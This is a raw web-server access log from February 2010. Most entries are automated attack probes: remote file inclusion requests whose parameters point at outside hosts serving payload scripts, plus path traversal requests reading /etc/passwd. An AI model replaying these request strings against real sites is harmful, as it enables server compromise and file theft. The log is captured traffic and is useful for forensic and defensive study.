117.74.98.18 - - [05/Feb/2010:18:13:38 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.iixiah.com/ix/skin/amick04_red/image/w0???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:18:18:02 -0800] "GET /logs/access_100130.log////write_update.php?board_skin_path=http://fidofamily.net/vnc/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:18:18:02 -0800] "GET ///write_update.php?board_skin_path=http://fidofamily.net/vnc/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:18:18:03 -0800] "GET /logs////write_update.php?board_skin_path=http://fidofamily.net/vnc/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:18:19:11 -0800] "GET /logs/access_100116.log////write_update.php?board_skin_path=http://fidofamily.net/vnc/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:20:01 -0800] "GET /logs//bbs/skin/uks_gallery_v1000/setup.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:20:01 -0800] "GET /bbs/skin/uks_gallery_v1000/setup.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:20:01 -0800] "GET /logs/access_100116.log//bbs/skin/uks_gallery_v1000/setup.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:20:13 -0800] "GET /logs/access.log//bbs/skin/uks_gallery_v1000/setup.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:20:47 -0800] "GET /logs/access.log//bbs/skin/uks_gallery_v1000/setup.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
38.99.98.118 - - [05/Feb/2010:18:26:09 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.getyourselfahorse.com"
38.99.98.118 - - [05/Feb/2010:18:26:10 -0800] "GET / HTTP/1.1" 200 915 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:18:28:58 -0800] "GET /logs//bbs/skin/uks_gallery_v1000/setup.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:18:28:58 -0800] "GET /logs/access_100116.log//bbs/skin/uks_gallery_v1000/setup.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:18:28:58 -0800] "GET /logs/access.log//bbs/skin/uks_gallery_v1000/setup.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:18:28:58 -0800] "GET /bbs/skin/uks_gallery_v1000/setup.php?dir=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:18:29:47 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:18:29:48 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:18:29:48 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:31:52 -0800] "GET /logs/access_100130.log%20%20//bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:31:52 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:31:53 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:32:26 -0800] "GET /bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:32:26 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:32:26 -0800] "GET /logs/access_100130.log%20%20//bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:32:31 -0800] "GET /bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:32:32 -0800] "GET /logs/access_100130.log%20%20//bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:32:32 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:32:36 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:32:36 -0800] "GET /logs/access_100130.log%20%20//bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:32:36 -0800] "GET /bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.39.145.146 - - [05/Feb/2010:18:32:37 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:18:37:28 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:18:37:29 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:18:37:30 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
67.195.113.251 - - [05/Feb/2010:18:44:17 -0800] "GET /logs/?S=D HTTP/1.0" 200 1208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.195.113.251 - - [05/Feb/2010:18:45:41 -0800] "GET /logs/access_100206.log HTTP/1.0" 200 5780356 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:18:45:53 -0800] "GET ///write_update.php?board_skin_path=http://medx-ray.com/html/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:18:51:04 -0800] "GET /logs/access_100130.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:18:51:25 -0800] "GET /logs/access_091121.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:18:51:26 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
187.51.144.67 - - [05/Feb/2010:18:51:26 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://freewebtown.com/blaahz/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
209.90.101.2 - - [05/Feb/2010:18:54:01 -0800] "GET /components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:18:58:59 -0800] "GET /logs/access_091121.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:18:58:59 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:18:58:59 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
209.90.101.2 - - [05/Feb/2010:19:01:26 -0800] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.getyourselfahorse.com"
209.90.101.2 - - [05/Feb/2010:19:01:26 -0800] "GET /components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.getyourselfahorse.com"
209.90.101.2 - - [05/Feb/2010:19:01:26 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:19:01:52 -0800] "GET /logs/access_100130.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
209.90.101.2 - - [05/Feb/2010:19:06:30 -0800] "GET /logs/access_091121.log//components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 - "-" "libwww-perl/5.822" "www.getyourselfahorse.com"
67.195.113.236 - - [05/Feb/2010:19:09:42 -0800] "GET /logs/?S=D HTTP/1.0" 200 1208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:19:12:20 -0800] "GET /logs/access_100130.log////write_update.php?board_skin_path=http://medx-ray.com/html/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:19:12:20 -0800] "GET ///write_update.php?board_skin_path=http://medx-ray.com/html/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:19:12:21 -0800] "GET /logs////write_update.php?board_skin_path=http://medx-ray.com/html/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:19:17:01 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:19:17:01 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:19:17:01 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:19:19:48 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:19:19:48 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:19:19:48 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:19:20:00 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:19:20:00 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.80.108.81 - - [05/Feb/2010:19:20:00 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
186.28.232.13 - - [05/Feb/2010:19:22:20 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
186.28.232.13 - - [05/Feb/2010:19:22:20 -0800] "GET /logs/access_100116.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:19:22:41 -0800] "GET /logs/access.log/errors.php?error=http://medx-ray.com/html/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:19:22:41 -0800] "GET /errors.php?error=http://medx-ray.com/html/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:19:22:41 -0800] "GET /logs/errors.php?error=http://medx-ray.com/html/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
186.28.232.13 - - [05/Feb/2010:19:22:41 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
67.195.113.236 - - [05/Feb/2010:19:22:46 -0800] "GET /?S=A HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
213.171.37.206 - - [05/Feb/2010:19:23:07 -0800] "GET /logs/access_100116.log%20//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
213.171.37.206 - - [05/Feb/2010:19:23:07 -0800] "GET /errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
213.171.37.206 - - [05/Feb/2010:19:23:07 -0800] "GET /logs//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
186.28.232.13 - - [05/Feb/2010:19:27:00 -0800] "GET /logs/access_100116.log%20//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
209.126.189.35 - - [05/Feb/2010:19:27:04 -0800] "GET /logs/access_100116.log////write_update.php?board_skin_path=http://medx-ray.com/html/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
213.171.37.206 - - [05/Feb/2010:19:29:35 -0800] "GET /logs/access_100116.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
219.94.194.248 - - [05/Feb/2010:19:30:47 -0800] "GET /logs/access_100130.log%20%20/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.194.248 - - [05/Feb/2010:19:30:47 -0800] "GET /logs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.194.248 - - [05/Feb/2010:19:30:47 -0800] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.194.248 - - [05/Feb/2010:19:31:13 -0800] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.194.248 - - [05/Feb/2010:19:31:13 -0800] "GET /logs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.194.248 - - [05/Feb/2010:19:31:13 -0800] "GET /logs/access_100130.log%20%20/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.194.248 - - [05/Feb/2010:19:33:18 -0800] "GET /logs/access_100116.log%20%20/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
219.94.194.248 - - [05/Feb/2010:19:34:04 -0800] "GET /logs/access_100116.log%20%20/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.11.230.249 - - [05/Feb/2010:19:34:28 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.11.230.249 - - [05/Feb/2010:19:34:28 -0800] "GET /logs/access_100116.log%20%20//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.11.230.249 - - [05/Feb/2010:19:34:28 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.11.230.249 - - [05/Feb/2010:19:34:41 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.11.230.249 - - [05/Feb/2010:19:34:41 -0800] "GET /logs/access_100116.log%20%20//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.11.230.249 - - [05/Feb/2010:19:34:41 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.11.230.249 - - [05/Feb/2010:19:35:55 -0800] "GET /logs/access_100116.log%20%20//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.11.230.249 - - [05/Feb/2010:19:35:55 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.11.230.249 - - [05/Feb/2010:19:35:55 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:37:34 -0800] "GET /logs/write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:37:34 -0800] "GET /write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:37:34 -0800] "GET /logs/access_100130.log%20%20/write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:39:29 -0800] "GET /write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:39:29 -0800] "GET /logs/write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:39:32 -0800] "GET /logs/access_100130.log%20%20/write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:39:32 -0800] "GET /logs/access_100130.log%20%20/write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:39:32 -0800] "GET /logs/write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:39:35 -0800] "GET /write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:19:40:52 -0800] "GET /logs/access_091121.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.113.236 - - [05/Feb/2010:19:40:58 -0800] "GET /?M=A HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:19:41:39 -0800] "GET /logs/access_100130.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.208.148.31 - - [05/Feb/2010:19:41:45 -0800] "GET /logs/access_100123.log//errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.208.148.31 - - [05/Feb/2010:19:41:45 -0800] "GET /errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.208.148.31 - - [05/Feb/2010:19:41:45 -0800] "GET /logs//errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:19:42:24 -0800] "GET /logs/access_100116.log%20%20/write_update.php?board_skin_path=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.125 - - [05/Feb/2010:19:42:29 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.125 - - [05/Feb/2010:19:42:29 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
218.38.136.125 - - [05/Feb/2010:19:42:29 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.208.148.31 - - [05/Feb/2010:19:42:55 -0800] "GET /logs/access_100130.log//errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:19:43:05 -0800] "GET /write_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:19:43:05 -0800] "GET /logs/write_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:19:43:05 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:19:43:08 -0800] "GET /logs/access_100130.log%20%20/write_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:19:43:16 -0800] "GET /write_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:19:43:16 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
220.73.144.196 - - [05/Feb/2010:19:43:16 -0800] "GET /logs/write_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
